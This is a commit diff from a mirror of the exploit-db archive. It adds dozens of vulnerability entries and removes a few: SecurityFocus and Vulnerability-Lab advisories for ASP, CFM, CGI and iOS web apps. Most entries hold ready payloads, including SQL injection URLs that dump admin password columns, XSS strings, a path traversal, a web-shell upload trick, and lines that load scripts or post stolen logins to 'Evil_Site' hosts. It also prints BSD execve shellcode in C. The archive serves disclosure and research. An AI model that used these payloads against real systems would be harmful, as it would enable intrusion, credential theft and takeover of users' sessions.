bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 12_12_2013

Browse source
This commit is contained in:
Offensive Security 2013-12-12 21:02:26 +00:00
parent 5a468df6b9
commit 6bd122cd4b
229 changed files with 17060 additions and 13228 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2922
files.csv
View file

File diff suppressed because it is too large Load diff

9
platforms/asp/webapps/30141.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24288/info
Hünkaray Okul Portalý is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
Hünkaray Okul Portalý 1.1 is vulnerable to this issue.
http://www.example.com/okul/haberoku.asp?id=11%20union+select+0,sifre,kullaniciadi,3,4+from+admin

7
platforms/asp/webapps/30159.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24345/info
ASP Folder Gallery is prone to an arbitrary-file-download vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the affected webserver.
http://www.example.com/aspfoldergallery/download_script.asp?file=viewimage.asp

9
platforms/asp/webapps/30165.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24379/info
Ibrahim Ã?AKICI Okul Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
Ibrahim Ã?AKICI Okul Portal 2.0 is vulnerable to this issue.
http://www.example.com/haber_oku.asp?id=9%20union+select+0,sifre,kulladi,3,4,5,6+from+uyeler

20
platforms/asp/webapps/30195.txt Executable file
View file

@ -0,0 +1,20 @@
#********************************************************************************
# Exploit Title : Webnet Studio Sql Injection Vulnerability
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://www.webnetstudio.it
#
# Google Dork : intext:"powered by Webnet Studio"
#
# Date: 2013-12-10
#
# Tested on: Windows 7 , Linux
#
# discovered by : ACC3SS
-------------------------------------------------------------------
# Exploit : Sql Injection
#
# Location : [Target]/content.asp?ID=[Sql Injection]
#
######################

7
platforms/asp/webapps/30198.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24515/info
TDizin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/TDizin/arama.asp?ara= "><script>alert("G3");</script>&submit=+T%27ARA+

11
platforms/asp/webapps/30203.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24562/info
Comersus Cart is affected by multiple input validation vulnerabilities.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
The attacker may also leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Comersus Cart 7.0.7 is vulnerable; other versions may also be affected.
http://www.example.com/store/comersus_optReviewReadExec.asp?idProduct='

11
platforms/asp/webapps/30204.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24562/info
Comersus Cart is affected by multiple input validation vulnerabilities.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
The attacker may also leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Comersus Cart 7.0.7 is vulnerable; other versions may also be affected.
http://www.example.com/path/store/comersus_customerAuthenticateForm.asp?redirectUrl="><script>window.location="http://www.Evil_Site.com/Trojan.exe"</script>

11
platforms/asp/webapps/30205.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24562/info
Comersus Cart is affected by multiple input validation vulnerabilities.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
The attacker may also leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Comersus Cart 7.0.7 is vulnerable; other versions may also be affected.
http://www.example.com/path/store/comersus_message.asp?message=<script src=http://www.Site.com/Evil_Script.js></script> http://www.example.com/path/store/comersus_message.asp?message=<form%20action="http://www.Evil_Site.com/Steal_Info.asp"%20method="post">Username:<input%20name="username"%20type="text"%20maxlength="10"><br>Password:<input%20name="password"%2 0type="text"%20maxlength="10"><br><input%20name="login"%20type="submit"%20value ="Login"></form>

7
platforms/asp/webapps/30207.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24563/info
FuseTalk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/blog/include/common/comfinish.cfm?FTRESULT.errorcode=0&FTVAR_SCRIPTRUN=[xss]

29
platforms/bsd_x86/shellcode/13253.c
View file

@ -1,29 +0,0 @@
/*
*BSD version
FreeBSD, OpenBSD, NetBSD.
s0t4ipv6@shellcode.com.ar
57 bytes.
-Encriptado execve(/bin/sh);
Para mas informacion ver
http://www.shellcode.com.ar/es/proyectos.html
*/
char shellcode[]=
"\xeb\x1b\x5e\x31\xc0\x6a\x1a\x6a\x17\x59\x49\x5b\x8a\x04\x0e"
"\xf6\xd3\x30\xd8\x88\x04\x0e\x50\x85\xc9\x75\xef\xeb\x05\xe8"
"\xe0\xff\xff\xff\x0e\x6f\xc7\xf9\xbe\xa3\xe4\xff\xb8\xff\xb2"
"\xf4\x1f\x95\x4c\xfb\xf8\xfc\x1f\x74\x09\xb2\x65";
main()
{
int *ret;
printf("Shellcode lenght=%d\n",sizeof(shellcode));
ret=(int*)&ret+2;
(*ret)=(int)shellcode;
}
// milw0rm.com [2004-09-26]

12
platforms/bsdi_x86/shellcode/13259.txt
View file

@ -1,12 +0,0 @@
/*
* BSDi
* execve() of /bin/sh by v9 (v9@fakehalo.org)
*/
static char exec[]=
"\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" /* 14 characters. */
"\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" /* 14 characters. */
"\xff\xff\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e" /* 14 characters. */
"\x2f\x73\x68\x00"; /* 4 characters; 46 characters total. */
# milw0rm.com [2004-09-26]

9
platforms/cfm/webapps/30202.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24528/info
FuseTalk is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
NOTE: Specific vulnerable versions were not disclosed. Reports also indicate that this issue has been addressed in the latest version of the application.
http://www.example.com/forum/include/error/autherror.cfm?FTVAR_URLP=x&errorcode=[SQL_INJ]

7
platforms/cfm/webapps/30206.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24563/info
FuseTalk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/forum/include/common/comfinish.cfm?FTRESULT.errorcode=0&FTVAR_SCRIPTRUN=[xss]

17
platforms/cgi/webapps/30156.txt Executable file
View file

@ -0,0 +1,17 @@
# Exploit Title: CGILua SQL Injection
# Google Dork: inurl:/cgilua.exe/sys/
# Vendor Homepage: https://web.tecgraf.puc-rio.br/cgilua/
# Version: < = 3.0
# Date: 09/12/2013
# Exploit Author: aceeeeeeeer
# Contact: http://www.twitter.com/aceeeeeeeer
# Tested on: Windows
####################################################################################
greetz: CrazyDuck - Synchr0N1ze - No\one - Kouback_TR_ - unknow_antisec -
elCorpse
Clandestine - MentorSec - Titio Vamp - LLL - Slayer Owner - masoqfellipe
####################################################################################
Exploit: /cgi/cgilua.exe/sys/start.htm?sid=[ SQLi ]
Demo: http://www.server.com/publique/cgi/cgilua.exe/sys/start.htm?sid=157

7
platforms/cgi/webapps/30199.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24516/info
WebIf is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this issue may allow an unauthorized user to view files and execute local scripts.
http://www.example.com/webif/webif.cgi?cmd=query&config=conf_2000/config.txt&outconfig=../../../../etc/issue

9
platforms/hardware/dos/30167.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24388/info
Packeteer PacketShaper is prone to a remote denial-of-service vulnerability because the application's web interface fails to properly handle unexpected requests.
Successfully exploiting this issue allows remote, authenticated attackers to reboot affected devices, denying service to legitimate users.
PacketShaper 7.3.0g2 and 7.5.0g1 are vulnerable to this issue; other versions may also be affected.
http://www.example.com/rpttop.htm?OP.MEAS.DATAQUERY=&MEAS.TYPE=

9
platforms/hardware/remote/30164.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24374/info
OfficeConnect Secure Router is prone to a cross-site scripting vulnerability.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
This issue affects OfficeConnect Secure Router firmware 1.04-168; other versions may also be affected.
http://example.com/cgi-bin/admin?page=1&tk=>[xss]

191
platforms/hardware/webapps/30056.txt
View file

@ -1,191 +0,0 @@
Document Title:
===============
Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1152
Release Date:
=============
2013-12-04
Vulnerability Laboratory ID (VL-ID):
====================================
1152
Common Vulnerability Scoring System:
====================================
6.7
Product & Service Introduction:
===============================
Wireless Transfer App is an easy to use photo and video transfer tool. It helps you easily and quickly transfer photos and videos
between iPhone and iPad, as well as transfer photos and videos from computer to iPad/iPhone/iPod and vice verse. With Wireless
Transfer App, you can transfer photos and videos from iPad to iPad, from iPad to iPhone, from iPhone to iPad, from iPhone to iPhone,
from computer to iPad, from iPhone to computer and more. There is no need for USB cable or extra software. You just need to put your
devices under the same Wi-Fi network.
(Copy of the Homepage: https://itunes.apple.com/en/app/wireless-transfer-app-share/id543119010 & http://www.wirelesstransferapp.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple command/path inject vulnerabilities in the Wireless Transfer App v3.7 for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2012-11-30: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Wireless Transfer App COM
Product: Wireless Transfer App 3.7
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A local command/path injection web vulnerability has been discovered in the Wireless Transfer App v3.7 for apple iOS.
The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the in the album name value of the wireless transfer app index and sub category list module.
Remote attackers are able to manipulate iOS device - `photo app` (default) album names. The execute of the injected
command/path request occurs in the album sub category list and the main album name index list. The security risk of the
command/path inject vulnerabilities are estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.7(-).
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access
and no direct user interaction. Successful exploitation of the vulnerability results unauthorized execution of system specific
commands or unauthorized path requests.
Vulnerable Application(s):
[+] Wireless Transfer App v3.7
Vulnerable Parameter(s):
[+] album name
[+] photoGallery_head - album
Affected Module(s):
[+] Index - Album Name List
[+] Sub Category - Title Album Name List
Proof of Concept (PoC):
=======================
The local command inject web vulnerabilities can be exploited by local low privileged device user accounts with low
user interaction. For security demonstration or to reproduce the vulnerability follow the information and steps below.
Manual steps to exploit the vulnerability ...
1. Install the wireless transfer v3.7 iOS mobile application
2. Open the default Photo app of your iOS device
3. Include an album with the following payload `">%20<x src=\..\<../var/mobile/Library/[x application path]>` and save it
4. Switch back to the installed wireless transfer app and start the wifi transfer
5. Open the local web-server url http://localhost:6688/ (default link)
6. The local path/command execute occurs in the album name value of the photoGallery_head class
7. Successful reproduce of the vulnerability!
PoC: Album Name - photoGallery_head in the Album Sub Category List
<div class="header">
<div class="logo"> <a href="index.html"><img src="images/logo.png" alt="logo"></a> </div>
<div class="title"><a href="index.html"><img src="images/title4.png" alt="logo"></a></div>
<div class="button"><a href="upload.html"><img src="images/anniuda2.png" alt=" "></a></div>
<div class="photoGallery_head">
<div class="phga_hd_left">Album : ">%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoGallery_head CLASS!]></div>
<div class="phga_hd_right">
<input value="Zur?ck zur Sammlung" class="back" type="button">
</div>
</div>
</div>
PoC: Album Name - photoalbum in the Album Index List
<div class="photo_list">
<dl><dt class="photoalbum" alt="D579B80C-B73D-4A16-9379-FB29A6CFC12C"><a href="albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C">
<img src="/albumimg_D579B80C-B73D-4A16-9379-FB29A6CFC12C.jpg" height="100" width="100"></a></dt>
<dd>>%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoalbum!]>(125)</dd></dl>
<dl><dt class="photoalbum" alt="632F9F75-1B7A-41E4-8070-E62B1ECC780A"><a href="albumhtm?id=632F9F75-1B7A-41E4-8070-E62B1ECC780A">
<img src="/albumimg_632F9F75-1B7A-41E4-8070-E62B1ECC780A.jpg" height="100" width="100"></a></dt><dd>Fotoarchiv(0)</dd></dl>
<dl><dt class="photoalbum" alt="C44B3062-3A67-4BFA-AF16-04CC8DE2CD29"><a href="albumhtm?id=C44B3062-3A67-4BFA-AF16-04CC8DE2CD29">
<img src="/albumimg_C44B3062-3A67-4BFA-AF16-04CC8DE2CD29.jpg" height="100" width="100"></a></dt><dd>WallpapersHD(3)</dd></dl>
Reference(s):
http://localhost:6688/index.html
http://localhost:6688/albumhtm
http://localhost:6688/albumhtm?id=
http://localhost:6688/albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the vulnerable album name value.
Parse and filter also the index and sub category output list to ensure it prevents local command/path requests.
Security Risk:
==============
The security risk of the local command/path inject web vulnerability is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

218
platforms/hardware/webapps/30145.txt Executable file
View file

@ -0,0 +1,218 @@
Document Title:
===============
Feetan Inc WireShare v1.9.1 iOS - Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1157
Release Date:
=============
2013-12-05
Vulnerability Laboratory ID (VL-ID):
====================================
1157
Common Vulnerability Scoring System:
====================================
6.4
Product & Service Introduction:
===============================
WireShare supports more than 30 different file formats, including PDF, EPUB, TXT, CHM,PNG,MP3, RMVB and AVI.
Youre able to import files via EMAIL,Wi-Fi, iTunes File Sharing, the built-in browser, and Dropbox, Box,
SkyDrive, Google Drive and SugarSync.... Files can be arranged in folders, copied, renamed, zipped, and
viewed. You can view the document, read novels, listen to music, view photos, play video, annotate PDF
and share files in WireShare.
(Copy of the Homepage: https://itunes.apple.com/de/app/wireshare-share-files-your/id527465632 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple persistent input validation web vulnerabilities
in the Feetan Inc WireShare (Share files with your friends) mobile application v1.9.1 for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2013-12-01: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities has been discovered in the WireShare v1.9.1 for apple iOS.
A persistent input validation web vulnerability allows remote attackers to inject own malicious script codes on the
application-side (persistent) of the affected application web-server.
The vulnerability is located in the add `New Folder` input field. The vulnerability allows remote attackers to inject
own malicious script codes on the application-side of the index path/folder listing. The script code execute occurs
in the index path/folder listing with the vulnerable foldername parameter. The inject can be done local by the device
via add folder function or by remote inject via web-interface. The second execute occurs when the user is requesting
to delete the malicious injected script code entry of the folder list. The security risk of the persistent input
validation web vulnerability in the foldername value is estimated as high(-) with a cvss (common vulnerability scoring
system) count of 6.4(+)|(-)6.5.
Exploitation of the persistent script code inject vulnerability via POST method request requires low user interaction
and no privileged web-interface user account. In the default settings is auth of the web-server deactivated and blank.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] New Folder (fileListContainer)
Vulnerable Module(s):
[+] folder [name value] (targetItem)
Affected Module(s):
[+] Folder Index List
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by local attackers with physical device access or
by remote attackers without privileged application user account and low user interaction. For security demonstration
or to reproduce the vulnerability follow the information and steps below.
PoC: Folder Index List - Index
<dt class="tthread">
<p class="hi"></p>
<p class="hn"><b>Name</b></p>
<p class="hs"><b>Size</b></p>
<p class="he"><b>Operation</b></p>
</dt>
<div style="background-image: url("/root/bg_file_list.jpg"); min-height:575px; margin-top: 93px;" id="fileListContainer">
<dd>
<p class="n">
<a href="http://localost:8080/New%20Folder%20%3C[PERSISTENT INJECTED SCRIPT CODE!]%3E">
<img src="WireShare_files/icon_folder.png" height="30" width="40"></a>
</p>
<p class="p">
<a href="http://localhost:8080/New%20Folder%20%3C[PERSISTENT INJECTED SCRIPT CODE!]%3E">New Folder <[PERSISTENT INJECTED SCRIPT CODE!].x"></a>
</p>
PoC: Folder Index List - Index
<div style="opacity: 0.5; height: 520px; width: 1349px; position: fixed; left: 0px; top: 0px;
z-index: 1001;" class="simplemodal-overlay" id="simplemodal-overlay"></div><div style="position: fixed;
z-index: 1002; height: 166px; width: 280px; left: 521.5px; top: 176px;" class="simplemodal-container"
id="simplemodal-container"><input class="simplemodal-close" name="cancelButton" id="cancelButton" value="" type="button">
<div style="height: 100%; outline: 0px none; width: 100%; overflow: auto;" class="simplemodal-wrap" tabindex="-1">
<div style="display: block;" class="simplemodal-data" id="modal-content">
<div id="modal-title"><h3>Delete File or Folder</h3></div>
<div id="modal-text"><a>Are you sure to delete it?
</a></div>
<form name="input" action="" method="post">
<div style="display: none;" id="modal-field"><input value="delete" name="operationType" type="hidden">
<input value="[PERSISTENT INJECTED SCRIPT CODE!]" name="originalItem" type="hidden"></div>
<input value="hello this is a test folder" name="ID" id="ID" class="inputone" type="hidden">
<input style="margin: 44px 4px 5px 3px;" value="" name="submitButton" id="submitButton" type="submit">
</form>
</div></div></div></body></html>
--- PoC Session Request Logs [POST] ---
Status: 200[OK]
POST http://192.168.2.106:8080/#
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Content Size[-1]
Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.106:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.106:8080/]
Connection[keep-alive]
Post Data:
targetItem[%2520%26%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fwww.vulnerability-lab.com+onload%3Dalert%28document.cookie%29+%3C]
operationType[create]
ID[0]
submitButton[]
Response Headers:
Transfer-Encoding[chunked]
Accept-Ranges[bytes]
Date[Sun, 01 Dec 2013 22:17:30 GMT]
Solution - Fix & Patch:
=======================
The persistent input validation web vulnerability can be patched by a secure encode of the new folder name input field.
Encode and filter also the folder name output list were the malicious context execute has been occured.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability is estimated as high(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

297
platforms/hardware/webapps/30146.txt Executable file
View file

@ -0,0 +1,297 @@
Document Title:
===============
Print n Share v5.5 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1154
Release Date:
=============
2013-12-06
Vulnerability Laboratory ID (VL-ID):
====================================
1154
Common Vulnerability Scoring System:
====================================
9.2
Product & Service Introduction:
===============================
Print directly to the widest range of network or WiFi printers, without a computer or AirPrint! Alternatively print
via your Mac/PC to ALL printers including USB & Bluetooth printers. Print... documents cloud files,web pages,emails,
attachments, photos, contacts, calendars, clipboard items, convert to PDF and much more - to ANY PRINTER!
(Copy of the Homepage: https://itunes.apple.com/en/app/print-n-share-der-all-in-one/id301656026
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the Print n Share v5.5 mobile application for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2013-12-01: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
EuroSmartz Ltd
Product: Print n Share 5.5
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
1.1
A local file/path include web vulnerability has been discovered in the official Print n Share v5.5 mobile application for apple iOS.
The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the application or service.
The remote file include web vulnerability is located in the import file module in the filename value. Remote attackers can inject own files or
path requests by adding regular text files (add). It is also possible to use the `rename` or `import` function to inject. The file include and
path request execute occurs in the main file dir index or subcategory listing of the mobile application. The security risk of the local file
include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 8.4(+).
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password.
Successful exploitation of the vulnerability results in unauthorized local file uploads and path requests to compromise the device or mobile app.
Request Method(s):
[+] [POST]
Vulnerable Inputs(s):
[+] Neue Text Datei (New Text File)
[+] Umbenennen File (Rename File)
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080)
1.2
An arbitrary file upload web vulnerability has been discovered in the official Print n Share v5.5 mobile application for apple iOS.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
The vulnerability is located in the import file module. Remote attackers are able to upload a php or js web-shells by renaming the file with
multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension
`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg & . gif file
extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is
estimated as high with a cvss (common vulnerability scoring system) count of 7.8(+).
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] File Import
Vulnerable Inputs(s):
[+] Importieren - File > Sync
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] File Path Listing (http://localhost:8080)
1.3
A persistent input validation web vulnerability has been discovered in the official Print n Share v5.5 mobile application for apple iOS.
The (persistent) vulnerability allows remote attacker to inject own malicious script code on the application-side of the mobile application.
The persistent input validation vulnerability is located in the Ordername (foldername) value of the print n share mobile web-application.
The exploitation can be done by usage of the local standard iOS pictures or video (default) app. Attackers rename the local device photo
or video foldername.The persistent execute occurs in the listed folder of the web-server interface (http://localhost:8080). Remote attackers
can also change the foldername by usage of the application to exploit (inject) via POST method own script code with persistent attack vector.
The vulnerable input are the `Ordername`(folder name), `Neuer Order` (new folder) and `Order Umbenennen` (folder rename). The security risk
of the persistent input validation web vulnerability is estimated as medium(+) with a cvss (common vulnerability scoring system) count of 4.5(+).
Exploitation of the persistent input validation web vulnerability requires no privileged mobile application user account but low or medium
user interaction. Successful exploitation of the persistent vulnerability results in persistent session hijacking (customers) attacks, account
steal via persistent web attacks, persistent phishing or persistent manipulation of vulnerable module context.
Request Method(s):
[+] [POST]
Vulnerable Input(s):
[+] Ordnername - (Foldername)
[+] Neuer Ordner - (New Folder)
[+] Ordner Umbenennen - (Rename Folder)
Vulnerable Parameter(s):
[+] foldername - (path)
Affected Module(s):
[+] File Dir List
Proof of Concept (PoC):
=======================
1.1
The file include web vulnerability can be exploited by remote attackers without user interaction and also without privileged
web-application user account. For security demonstration or to reproduce the vulnerability follow the steps and information below.
PoC:
http://localhost:8080/[LOCAL FILE INCLUDE WEB VULNERABILITY!]">X>"<<>"</[LOCAL FILE INCLUDE WEB VULNERABILITY!]">.php
PoC Source: Local File Include Vulnerability - Filename
<html><head>
<title>/</title>
<meta http-equiv="CONTENT-TYPE" content="text/html; charset=UTF-8">
</head>
<body>
<h2>?/</h2><br><a href="/Clip-Archiv/">Clip-Archiv/</a>
<br>X<a href="/[LOCAL FILE INCLUDE WEB VULNERABILITY!]">X>"<<>"</[LOCAL FILE INCLUDE WEB VULNERABILITY!]">.php</a>
<br><a href="/[LOCAL FILE INCLUDE WEB VULNERABILITY!]">[LOCAL FILE INCLUDE WEB VULNERABILITY!].txt</a>
</body>
<html>
</iframe></a></body></html>
Reference(s):
http://localhost:8080/
1.2
The arbitrary file upload vulnerability can be exploited by remote attackers without user interaction and also without privileged
web-application user account. For security demonstration or to reproduce the vulnerability follow the steps and information below.
PoC:
http://localhost:8080/[file to path]">X>"<<>"</[ARBITRARY FILE UPLOAD WEB VULNERABILITY!]">.jpg.gif..html.js.php.gif.jpg
PoC Source: Arbitrary File Upload Vulnerability - Filename
<html><head>
<title>/</title>
<meta http-equiv="CONTENT-TYPE" content="text/html; charset=UTF-8">
</head>
<body>
<h2>?/</h2><br><a href="/Clip-Archiv/">Clip-Archiv/</a>
<br>X<a href="/[file]">X>"<<>"</[ARBITRARY FILE UPLOAD WEB VULNERABILITY!]">.jpg.gif..html.js.php.gif.jpg</a>
<br><a href="/[file]">[ARBITRARY FILE UPLOAD WEB VULNERABILITY!].jpg.gif..html.js.php.gif.jpg</a>
</body>
<html>
</iframe></a></body></html>
Reference(s):
http://localhost:8080/
1.3
The persistent input validation vulnerability can be exploited by remote attackers without privileged web-application user account
and with low user interaction. For security demonstration or to reproduce the vulnerability follow the steps and information below.
PoC:
http://localhost:8080/%3E%22%3C%3C%3E%22%3C[PERSISTENT INJECTED SCRIPT CODE!]%3E/">
